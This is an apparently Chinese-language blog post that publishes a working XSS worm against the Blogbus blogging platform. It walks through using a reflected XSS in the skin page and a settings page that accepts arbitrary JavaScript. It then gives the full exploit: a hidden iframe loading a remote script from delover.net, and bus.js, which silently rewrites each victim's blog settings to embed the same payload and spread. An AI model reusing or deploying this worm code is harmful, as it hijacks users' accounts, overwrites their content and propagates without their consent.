Blogbus蠕虫

发表评论 (0) 查看评论

本来以为很简单的。测试碰到了不少问题。
后台管理为:http://www.blogbus.com/user/
前台XSS为:http://xxx.blogbus.com
需要跨域。直接试用COOKIE提交缺少session_id.
博客主页cookie:

—————————
Windows Internet Explorer
—————————
__utma=269084194.42081505.1243533426.1243533426.1243538283.2; __utmz=269084194.1243533426.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); valid=blogbus.com; bus_xuid=4856367; __utmb=269084194; __utmc=269084194; bus_uid=4856367; cmt_homepage=http%3A%2F%2F
—————————
确定  
—————————

后台cookie:

—————————
Windows Internet Explorer
—————————
blogbus_as_hash=4be67586fb028479bc7c8e8d105d37a6; __utma=269084194.42081505.1243533426.1243533426.1243538283.2; __utmz=269084194.1243533426.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); valid=blogbus.com; bus_xuid=4856367; __utmb=269084194; __utmc=269084194; bus_uid=4856367; cmt_homepage=http%3A%2F%2F; bus_sessid=bf414d9e43c1a75274de5ab2c09567db
—————————
确定  
—————————

偷懒找到一个非持久的XSS,刚好cookie里包含了session_id

http://www.blogbus.com/skin/?style=< … script>

后面就简单了:
http://www.blogbus.com/user/?mm=Setting
页面允许写入任意JS。前台执行。我们一个隐藏框架将非持久传唤为持久。

最后贴上exp,很多bug,写的匆忙,将所有的选项都直接修改了。

<iframe style="display:none" src="http://www.blogbus.com/skin/?style=<SCRIPT%20src=’http://www.delover.net/bus.js’></SCRIPT>"></iframe>
bus.js

function createAjax() {
    var _xmlhttp;
    try {
        _xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
    }
    catch (e) {
        try {
            _xmlhttp=new XMLHttpRequest();
        }
        catch (e) {
            _xmlhttp=false;
        }
    }
    return _xmlhttp;
}

//javascript:alert(document.cookie)

function GetTag() {
    var xmlhttp=createAjax();
    if (xmlhttp) {
        xmlhttp.open(‘get’,’/user/?blogid=4884256&mm=Setting&n=’+Math.random(),true);
        xmlhttp.onreadystatechange=function() {
            if (xmlhttp.readyState==4 && xmlhttp.status==200) {
                if (unescape(xmlhttp.responseText).indexOf("www.blogbus.com/skin")>=0 || unescape(xmlhttp.responseText).indexOf("img_regbtn.gif")>=0){
                    //传播过了
                }else{
                    AddNew();
                }
            }
        }
        xmlhttp.send(null);
    }
}

function AddNew() {
    var xmlhttp=createAjax();
    if (xmlhttp) {   

        var GuestInfo="BlogName=jackal&Description=jackal&AccessPwd=&Meta=%3Ciframe+style%3D%22display%3Anone%22+src%3D%22http%3A%2F%2Fwww.blogbus.com%2Fskin%2F%3Fstyle%3D%3CSCRIPT%2520src%3D%27http%3A%2F%2Fdelover.net%2Fbus.js%27%3E%3C%2FSCRIPT%3E%22%3E%3C%2Fiframe%3E&Submit=%E4%BF%9D%E5%AD%98%E8%AE%BE%E7%BD%AE";
        //debug
        //alert(GuestInfo);
        xmlhttp.open(‘post’,’/user/?mm=Setting&aa=Save&n=’+Math.random(),true);
        xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
        xmlhttp.onreadystatechange=function() {
            if (xmlhttp.readyState==4 && xmlhttp.status==200) {
                //alert(unescape(xmlhttp.responseText));
            }
        }
        xmlhttp.send(GuestInfo);
    }
}

GetTag();
测试地址:http://delover.blogbus.com/

发表评论?

0 条评论。

发表评论